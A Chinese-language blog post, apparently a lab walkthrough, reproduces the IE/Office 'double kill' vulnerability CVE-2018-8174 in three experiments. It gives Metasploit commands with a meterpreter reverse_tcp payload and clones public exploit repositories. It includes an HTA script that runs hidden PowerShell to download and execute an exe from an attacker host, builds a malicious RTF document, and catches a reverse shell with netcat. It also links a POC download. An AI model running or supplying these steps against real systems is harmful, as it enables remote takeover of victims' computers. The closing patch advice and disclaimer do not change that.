用不同姿势复现 CVE-2018-8174 漏洞

本文作者：\xeb\xfe（信安之路作者团队成员）

日前，360 核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用 0day 漏洞的 APT 攻击，捕获到了全球首例利用浏览器 0day 漏洞的新型 Office 文档攻击，我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打开 Office 文档时都可能中招，最终被黑客植入后门木马完全控制电脑。

实验一：metasploit 复现

下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
setPAYLOAD windows/meterpreter/reverse_tcp
setsrvhost 192.168.188.141
setlhost 192.168.188.141
exploit

注: 实验失败，攻击过程中看到的确发起了攻击，但是没有会话返回，freebuf 发布的文章中，也只是session -l，并没有真正的会话返回。

实验二： 利用 mshta 从远程服务器下载文件并执行。

POC 附件：https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密码：ci8h

1.构造 hta 文件，通过 ActiveXObject 调用 WScript.shell，执行 powershell 命令，实现下载文件并执行。

<script>
a=newActiveXObject("WScript.Shell");
a.run('powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://192.168.188.141/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

我使用的攻击机是 kali2018.2，启动 apache2 服务，将该文件 test.hta 上传到默认网站路径 /var/www/html/,得到地址:

http://192.168.188.141/test.hta

使用 msfvenom 生成反弹 shell exe 。

2.使用 `msfvenom` 生成 js Shellcode

把生成的 Shellcode 字符替换至 8174poc.html 166 行代码

3.生成 Word 文档。

下载 python 脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://192.168.188.141/8174poc.html -o exp.rtf

4.开启 msf 监听。

得到目录中的 “exp.rtf ”文件，使用 Word 文档打开即可下载执行 xxx.exe 文件，或者 IE 浏览器打开

http://192.168.188.141/8174poc.html

即可下载执行 xxx.exe 文件

注: 实验失败，攻击发动了，但是没有获取到反弹 shell。（其他朋友用 MSF 复现也遇到同样的情况。）

实验三：利用 NC 监听获取 msf session.

下载 python 脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

本地启动 apache 服务，运行 CVE-2018-8174.py 生成攻击 RTF（exp.rtf）和攻击 HTML(exploit.html)。

python CVE-2018-8174.py -u http://192.168.188.141/exploit.html -o exp.rtf -i 192.168.188.141 -p 4444`

将攻击 RTF（exp.rtf）和攻击 HTML( exploit.html) 复制到 apache 网站根目录，

攻击机开启本地NC监听，

在被攻击机 (192.168.188.140) 上用 IE 浏览器打开链接

http://192.168.188.141/exploit.html

这里会自动跳转一下，然后在攻击机上可以看到反弹回来的 shell 了。

到这里已经成功获取到 shell。

实验中遇到的坑：

1、NC 测试成功，尝试 msf handler 监听，出现错误。

获取到会话，直接 died 了。

2、使用 IE32 位浏览器，成功获取到会话，尝试 IE64 位浏览器出现错误。

访问网页，无任何反应。

3、使用 64 位 office 打开 RTF 文件，无任何反应。

总结：

经多次实验，发现目前支持的版本是 32 位 IE 浏览器和 32 位 office。网页访问上线的，就算把浏览器关闭了，shell 依然是存活状态。微软已发布官方补丁，对该 0day 漏洞进行了修复。APT 攻击防不胜防，在平时尽量不要点开来历不明的 offce 文档或者链接，及时更新系统补丁。

本文章的内容只限技术研究，用于非法攻击产生风险自担。

参考链接：

CVE-2018-8174 “双杀”0day漏洞复现

http://www.freebuf.com/vuls/173727.html